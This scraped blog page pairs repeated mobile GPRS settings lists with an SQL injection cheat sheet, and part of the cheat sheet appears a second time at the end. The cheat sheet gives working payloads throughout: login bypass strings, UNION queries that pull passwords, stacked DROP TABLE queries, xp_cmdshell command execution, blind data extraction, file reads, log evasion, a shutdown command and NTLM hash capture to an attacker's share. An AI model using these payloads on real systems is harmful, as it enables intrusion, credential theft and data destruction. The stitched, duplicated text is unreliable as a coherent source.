Account Name – Airtel_live
Homepage – http://live.airtelworld.com
Username – leave Blank
Password – leave Blank
Proxy – Enabled/yes
Proxy and Server Adress – 100.001.200.099
Accespoint Name – airtelfun.com
Proxy and Server Port – 8080
Data bearer – GPRS/ Packet Data
Authentication Type – Normal
Manual BPL gprs Settings:
Account Name – BPL WAP
Username – leave blank
Password – leave blank
Proxy – Enabled/yes
Homepage – http://wap.mizone.bplmobile.com
Proxy and Server address – 10.0.0.10
Proxy and Server Port – 8080
Acces Point Name – mizone
Data bearer – GPRS/ Packetdata
Authentication Type – Normal
Manual BSNL north gprs Settings:
Account Name – bsnlwap
Username – leave blank
Password – leave blank
Proxy – Enabled/yes
Homepage – http://wap.cellone.in
Proxy and Server address – 010.132.194.196
Proxy and Server Port – 8080
Acces Point Name – wapnorth.cellone.in
Data bearer – GPRS/ Packetdata
Authentication Type – Normal
Manual Idea Gprs Settings
Account Name – idea_GPRS
Username – Blank
Password – Blank
Homepage – http://wap.ideafresh.com
Proxy and Server Port – 8080
Proxy and Server adress – 10.4.42.45
Databearer – GPRS / Packetdata
Acces Point Name – imis
Proxy – Enabled/yes
Authentication Type – Normal
Manual Bsnl Gprs Settings
Account Name – BPL WAP
Username -
Password -
Proxy – Enabled/yes
Homepage – http://techarena.in
Proxy and Server address – 10.0.0.10
Proxy and Server Port – 8080
Acces Point Name – mizone
Data bearer – GPRS/ Packetdata
Authentication Type – Normal
Manual Hutch Gprs Settings
Account Name – Hutch_GPRS
User Name – Blank
Password – Blank
Proxy – Enabled/yes
Access Point Name – portalnmms
Full Internet Access Point Name – www
Proxy and Server address – 10.10.1.100
Proxy and Server Port – 8080
Homepage – http://hutchworld.co.in
Authentication Type – Normal
Manual Airtel live settings
Account Name – Airtel_live
Homepage – http://live.airtelworld.com
Username – Blank
Password – Blank
Proxy – Enabled/yes
Proxy and Server Adress – 100.1.200.99
Accespoint Name – airtelfun.com
Proxy and Server Port – 8080
Data bearer – GPRS/ Packet Data
Authentication Type – Normal
Manual Airtel Gprs Settings
Homepage – any page you want to set. (eg. http://techarena.in)
User Name – Blank
Password – Blank
Proxy – Enabled/yes.
Proxy and Server Adress – 202.56.231.117
Proxy and Server Port – 8080
Data bearer – GPRS or Packet Data.
Access Point Name – airtelgprs.com
Authentication Type – Normal
Use preferred access point – No
Manual Hutch Gprs Settings
1. Account Name – Hutch_GPRS
2. User Name – Blank
3. Password – Blank
4. Proxy – Enabled/yes
5. Access Point Name – portalnmms
6. Full Internet Access Point Name – www
7. Proxy and Server address – 10.10.1.100
8. Proxy and Server Port – 8080
9. Homepage – http://hutchworld.co.in
10. Authentication Type – Normal
Manual Airtel Gprs Settings
1. Homepage – any page you want to set.
2. User Name – Blank
3. Password – Blank
4. Proxy – Enabled/yes.
5. Proxy and Server Adress – 202.56.231.117
6. Proxy and Server Port – 8080
7. Data bearer – GPRS or Packet Data.
8. Access Point Name – airtelgprs.com
9. Authentication Type – Normal
10. Use preferred access point – No
Manual Airtel live settings
1. Account Name – Airtel_live
2. Homepage – http://live.airtelworld.com
3. Username – Blank
4. Password – Blank
5. Proxy – Enabled/yes
6. Proxy and Server Adress – 100.1.200.99
7. Accespoint Name – airtelfun.com
8. Proxy and Server Port – 8080
9. Data bearer – GPRS/ Packet Data
10. Authentication Type – Normal
Manual Idea Gprs Settings
1. Account Name – idea_GPRS
2. Username – Blank
3. Password – Blank
4. Homepage – http://wap.ideafresh.com
5. Proxy and Server Port – 8080
6. Proxy and Server adress – 10.4.42.45
7. Databearer – GPRS / Packetdata
8. Acces Point Name – imis
9. Proxy – Enabled/yes
10. Authentication Type – Normal
Manual Bsnl Gprs Settings
1. Account Name – BPL WAP
2. Username -
3. Password -
4. Proxy – Enabled/yes
5. Homepage – http://wap.mizone.bplmobile.com
6. Proxy and Server address – 10.0.0.10
7. Proxy and Server Port – 8080
8. Acces Point Name – mizone
9. Data bearer – GPRS/ Packetdata
10. Authentication Type – Normal
Wednesday, September 30, 2009
About SQL Injection Cheat Sheet
Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.
Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself.
M : MySQL
S : SQL Server
P : PostgreSQL
O : Oracle
+ : Possibly all other databases
Examples;
• (MS) means : MySQL and SQL Server etc.
• (M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server
Table Of Contents
1. About SQL Injection Cheat Sheet
2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
1. Line Comments
SQL Injection Attack Samples
2. Inline Comments
Classical Inline Comment SQL Injection Attack Samples
MySQL Version Detection Sample Attacks
3. Stacking Queries
Language / Database Stacked Query Support Table
About MySQL and PHP
Stacked SQL Injection Attack Samples
4. If Statements
MySQL If Statement
SQL Server If Statement
If Statement SQL Injection Attack Samples
5. Using Integers
6. String Operations
String Concatenation
7. Strings without Quotes
Hex based SQL Injection Samples
8. String Modification & Related
9. Union Injections
UNION – Fixing Language Issues
10. Bypassing Login Screens
11. Enabling xp_cmdshell in SQL Server 2005
12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.
Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
Ending / Commenting Out / Line Comments
Line Comments
Comments out rest of the query.
Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.
• -- (SM)
DROP sampletable;--
• # (M)
DROP sampletable;#
Line Comments Sample SQL Injection Attacks
• Username: admin'--
• SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you as admin user, because rest of the SQL query will be ignored.
Inline Comments
Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
• /*Comment Here*/ (SM)
• DROP/*comment*/sampletable
• DR/**/OP/*bypass blacklisting*/sampletable
• SELECT/*avoid-spaces*/password/**/FROM/**/Members
• /*! MYSQL Special SQL */ (M)
This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.
SELECT /*!32302 1/0, */ 1 FROM tablename
Classical Inline Comment SQL Injection Attack Samples
• ID: 10; DROP TABLE members /*
Simply get rid of other stuff at the end the of query. Same as 10; DROP TABLE members --
• SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw an divison by 0 error if MySQL version is higher than 3.23.02
MySQL Version Detection Sample Attacks
• ID: /*!32302 10*/
• ID: 10
You will get the same response if MySQL version is higher than 3.23.02
• SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw an divison by 0 error if MySQL version is higher than 3.23.02
Stacking Queries
Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.
• ; (S)
SELECT * FROM members; DROP members--
Ends a query and starts a new one.
Language / Database Stacked Query Support Table
green: supported, dark gray: not supported, light gray: unknown
SQL Server MySQL PostgreSQL ORACLE MS Access
ASP
ASP.NET
PHP
Java
About MySQL and PHP;
To clarify some issues;
PHP - MySQL doesn't support stacked queries, Java doesn't support stacked queries (I'm sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?
Stacked SQL Injection Attack Samples
• ID: 10;DROP members --
• SELECT * FROM products WHERE id = 10; DROP members--
This will run DROP members SQL sentence after normal SQL Query.
If Statements
Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.
MySQL If Statement
• IF(condition,true-part,false-part) (M)
SELECT IF(1=1,'true','false')
SQL Server If Statement
• IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'
If Statement SQL Injection Attack Samples
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
This will throw an divide by zero error if current logged user is not "sa" or "dbo".
Using Integers
Very useful for bypassing, magic_quotes() and similar filters, or even WAFs.
• 0xHEXNUMBER (SM)
You can write hex like these;
SELECT CHAR(0x66) (S)
SELECT 0x5045 (this is not an integer it will be a string from Hex) (M)
SELECT 0x50 + 0x45 (this is integer now!) (M)
String Operations
String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.
String Concatenation
• + (S)
SELECT login + '-' + password FROM members
• || (*MO)
SELECT login || '-' || password FROM members
*About MySQL "||";
If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using CONCAT() function in MySQL.
• CONCAT(str1, str2, str3, ...) (M)
Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members
Strings without Quotes
These are some direct ways to using strings but it’s always possible to use CHAR()(MS) and CONCAT()(M) to generate string without quotes.
• 0x457578 (M) - Hex Representation of string
SELECT 0x457578
This will be selected as string in MySQL.
In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
• Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
This will return ‘KLM’.
• SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
This will return ‘KLM’.
Hex based SQL Injection Samples
• SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
This will show the content of c:\boot.ini
String Modification & Related
• ASCII() (SMP)
Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.
SELECT ASCII('a')
• CHAR() (SM)
Convert an integer of ASCII.
SELECT CHAR(64)
Union Injections
With union you do SQL queries cross-table. Basically you can poison query to return records from another table.
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
This will combine results from both news table and members table and return all of them.
Another Example :
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
UNION – Fixing Language Issues
While exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to fix this problem. It's rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.
• SQL Server (S)
Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.
SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members
• MySQL (M)
Hex() for every possible issue
Bypassing Login Screens (SMO+)
SQL Injection 101, Login tricks
• admin' --
• admin' #
• admin'/*
• ' or 1=1--
• ' or 1=1#
• ' or 1=1/*
• ') or '1'='1--
• ') or ('1'='1--
• ....
• Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
*Old versions of MySQL doesn't support union queries
Bypassing second MD5 hash check login screens
If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
Bypassing MD5 Hash Check Example (MSP)
Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
Error Based - Find Columns Names
Finding Column Names with HAVING BY - Error Based (S)
In the same order,
• ' HAVING 1=1 --
• ' GROUP BY table.columnfromerror1 HAVING 1=1 --
• ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
• ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
• If you are not getting any more error then it's done.
Finding how many columns in SELECT query by ORDER BY (MSO+)
Finding column number by ORDER BY can speed up the UNION SQL Injection process.
• ORDER BY 1--
• ORDER BY 2--
• ORDER BY N-- so on
• Keep going until get an error. Error means you found the number of selected columns.
Data types, UNION, etc.
Hints,
• Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records with distinct.
• To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (if injection is in WHERE). This can be critical if you are only getting one result at a time.
• Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.
o Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (because normally developers are not expecting to see NULL in a username field)
Finding Column Type
• ' union select sum(columntofind) from users-- (S)
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
If you are not getting error it means column is numeric.
• Also you can use CAST() or CONVERT()
o SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--
• 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
No Error - Syntax is right. MS SQL Server Used. Proceeding.
• 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-
No Error – First column is an integer.
• 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
Error! – Second column is not an integer.
• 11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-
No Error – Second column is a string.
• 11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
Error! – Third column is not an integer. ...
Microsoft OLE DB Provider for SQL Server error '80040e07'
Explicit conversion from data type int to image is not allowed.
You’ll get convert() errors before union target errors ! So start with convert() then union
Simple Insert (MSO+)
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes
@@version (MS)
Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions.
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
Bulk Insert (S)
Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.
1. Create table foo( line varchar(8000) )
2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
3. Drop temp table, and repeat for another file.
BCP (S)
Write text file. Login Credentials are required to use this function.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
VBS, WSH in SQL Server (S)
You can use VBS, WSH scripting in SQL Server because of ActiveX support.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
Executing system commands, xp_cmdshell (S)
Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access.
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
Simple ping check (configure your firewall or sniffer to identify request before launch it),
EXEC master.dbo.xp_cmdshell 'ping'
You can not read results directly from error or union or something else.
Some Special Tables in SQL Server (S)
• Error Messages
master..sysmessages
• Linked Servers
master..sysservers
• Password (2000 and 20005 both can be crackable, they use very similar hashing algorithm )
SQL Server 2000: masters..sysxlogins
SQL Server 2005 : sys.sql_logins
More Stored Procedures for SQL Server (S)
1. Cmd Execute (xp_cmdshell)
exec master..xp_cmdshell 'dir'
2. Registry Stuff (xp_regread)
1. xp_regaddmultistring
2. xp_regdeletekey
3. xp_regdeletevalue
4. xp_regenumkeys
5. xp_regenumvalues
6. xp_regread
7. xp_regremovemultistring
8. xp_regwrite
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
3. Managing Services (xp_servicecontrol)
4. Medias (xp_availablemedia)
5. ODBC Resources (xp_enumdsn)
6. Login mode (xp_loginconfig)
7. Creating Cab Files (xp_makecab)
8. Domain Enumeration (xp_ntsec_enumdomains)
9. Process Killing (need PID) (xp_terminate_process)
10. Add new procedure (virtually you can execute whatever you want)
sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’
exec xp_webserver
11. Write text file to a UNC or an internal path (sp_makewebtask)
MSSQL Bulk Notes
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
You can not use sub selects in SQL Server Insert queries.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
If injection is in second limit you can comment it out or use in your union injection
Shutdown SQL Server (S)
When you really pissed off, ';shutdown --
Enabling xp_cmdshell in SQL Server 2005
By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
Finding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
Moving records (S)
• Modify WHERE and use NOT IN or NOT EXIST,
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- very good one
• Using Dirty Tricks
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int
Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21
Fast way to extract data from Error Based SQL Injections in SQL Server (S)
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
Detailed Article : Fast way to extract data from Error Based SQL Injections
Blind SQL Injections
About Blind SQL Injections
In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.
Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code
Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.
In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.
Real and a bit Complex Blind SQL Injection Attack Sample
This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.
TRUE and FALSE flags mark queries returned true or false.
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.
Waiting For Blind SQL Injections
First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.
WAIT FOR DELAY 'time' (S)
This is just like sleep, wait for spesified time. CPU safe way to make database wait.
WAITFOR DELAY '0:0:10'--
Also you can use fractions like this,
WAITFOR DELAY '0:0:0.51'
Real World Samples
• Are we 'sa' ?
if (select user) = 'sa' waitfor delay '0:0:10'
• ProductID = 1;waitfor delay '0:0:10'--
• ProductID =1);waitfor delay '0:0:10'--
• ProductID =1';waitfor delay '0:0:10'--
• ProductID =1');waitfor delay '0:0:10'--
• ProductID =1));waitfor delay '0:0:10'--
• ProductID =1'));waitfor delay '0:0:10'--
BENCHMARK() (M)
Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
BENCHMARK(howmanytimes, do this)
Real World Samples
• Are we root ? woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
• Check Table exist in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
pg_sleep(seconds) (P)
Sleep for supplied seconds.
• SELECT pg_sleep(10);
Sleep 10 seconds.
Covering Tracks
SQL Server -sp_password log bypass (S)
SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible)
Clear SQL Injection Tests
These tests are simply good for blind sql injection and silent attacks.
1. product.asp?id=4 (SMO)
a. product.asp?id=5-1
b. product.asp?id=4 OR 1=1
2. product.asp?name=Book
a. product.asp?name=Bo’%2b’ok
b. product.asp?name=Bo’ || ’ok (OM)
c. product.asp?name=Book’ OR ‘x’=’x
Some Extra MySQL Notes
• Sub Queries are working only MySQL 4.1+
• Users
o SELECT User,Password FROM mysql.user;
• SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;
• SELECT ... INTO DUMPFILE
o Write query into a new file (can not modify existing files)
• UDF Function
o create function LockWorkStation returns integer soname 'user32';
o select LockWorkStation();
o create function ExitProcess returns integer soname 'kernel32';
o select exitprocess();
• SELECT USER();
• SELECT password,USER() FROM mysql.user;
• First byte of admin hash
o SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
• Read File
o query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
• MySQL Load Data inifile
o By default it’s not avaliable !
create table foo( line blob );
load data infile 'c:/boot.ini' into table foo;
select * from foo;
• More Timing in MySQL
• select benchmark( 500000, sha1( 'test' ) );
• query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
• select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
Enumeration data, Guessed Brute Force
o select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
Potentially Useful MySQL Functions
• MD5()
MD5 Hashing
• SHA1()
SHA1 Hashing
• PASSWORD()
• ENCODE()
• COMPRESS()
Compress data, can be great in large binary reading in Blind SQL Injections.
• ROW_COUNT()
• SCHEMA()
• VERSION()
Same as @@version
Second Order SQL Injections
Basically you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem.
Name : ' + (SELECT TOP 1 password FROM users ) + '
Email : xx@xx.com
If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.
Forcing SQL Server to get NTLM Hashes
This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain & Abel.
Bulk insert from a UNC Share (S)
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
Check out Bulk Insert Reference to understand how can you use bulk insert.
References
Since these notes collected from several different sources within several years and personal experiences, may I missed some references. If you believe I missed yours or someone else then drop me an email (ferruh-at-mavituna.com), I'll update it as soon as possible.
• Lots of Stuff
o Advanced SQL Injection In SQL Applications, Chris Anley
o More Advanced SQL Injection In SQL Applications, Chris Anley
o Blindfolded SQL Injection, Ofer Maor – Amichai Shulman
o Hackproofing MySQL, Chris Anley
o Database Hacker's Handbook, David Litchfield, Chris Anley, John Heasman, Bill Grindlay
o Upstairs Team!
• MSSQL Related
o MSSQL Operators - http://msdn2.microsoft.com/en-us/library/aa276846(SQL.80).aspx
o Transact-SQL Reference - http://msdn2.microsoft.com/en-us/library/aa299742(SQL.80).aspx
o String Functions (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms181984.aspx
o List of MSSQL Server Collation Names - http://msdn2.microsoft.com/en-us/library/ms180175.aspx
o MSSQL Server 2005 Login Information and some other functions : Sumit Siddharth
• MySQL Related
o Comments : http://dev.mysql.com/doc/
o Control Flows - http://dev.mysql.com/doc/refman/5.0/en/control-flow-functions.html
o MySQL Gotchas - http://sql-info.de/mysql/gotchas.htm
o New SQL Injection Concept, Tonu Samuel
ChangeLog
• 15/03/2007 - Public Release v1.0
• 16/03/2007 - v1.1
o Links added for some paper and book references
o Collation sample added
o Some typos fixed
o Styles and Formatting improved
o New MySQL version and comment samples
o PostgreSQL Added to Ascii and legends, pg_sleep() added blind section
o Blind SQL Injection section and improvements, new samples
o Reference paper added for MySQL comments
• 21/03/2007 - v1.2
o BENCHMARK() sample changed to avoid people DoS their MySQL Servers
o More Formatting and Typo
o Descriptions for some MySQL Function
• 30/03/2007 v1.3
o Niko pointed out PotsgreSQL and PHP supports stacked queries
o Bypassing second MD5 check login screens description and attack added
o Mark came with extracting NTLM session idea, added
o Detailed Blind SQL Exploitation added
• 13/04/2007 v1.4 - Release
o SQL Server 2005 enabling xp_cmdshell added (trick learned from mark)
o Japanese version of SQL Injection Cheat Sheet released (v1.1)
Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself.
M : MySQL
S : SQL Server
P : PostgreSQL
O : Oracle
+ : Possibly all other databases
Examples;
• (MS) means : MySQL and SQL Server etc.
• (M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server
Table Of Contents
1. About SQL Injection Cheat Sheet
2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
1. Line Comments
SQL Injection Attack Samples
2. Inline Comments
Classical Inline Comment SQL Injection Attack Samples
MySQL Version Detection Sample Attacks
3. Stacking Queries
Language / Database Stacked Query Support Table
About MySQL and PHP
Stacked SQL Injection Attack Samples
4. If Statements
MySQL If Statement
SQL Server If Statement
If Statement SQL Injection Attack Samples
5. Using Integers
6. String Operations
String Concatenation
7. Strings without Quotes
Hex based SQL Injection Samples
8. String Modification & Related
9. Union Injections
UNION – Fixing Language Issues
10. Bypassing Login Screens
11. Enabling xp_cmdshell in SQL Server 2005
12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.
Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
Ending / Commenting Out / Line Comments
Line Comments
Comments out rest of the query.
Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.
• -- (SM)
DROP sampletable;--
• # (M)
DROP sampletable;#
Line Comments Sample SQL Injection Attacks
• Username: admin'--
• SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
This is going to log you as admin user, because rest of the SQL query will be ignored.
Inline Comments
Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
• /*Comment Here*/ (SM)
• DROP/*comment*/sampletable
• DR/**/OP/*bypass blacklisting*/sampletable
• SELECT/*avoid-spaces*/password/**/FROM/**/Members
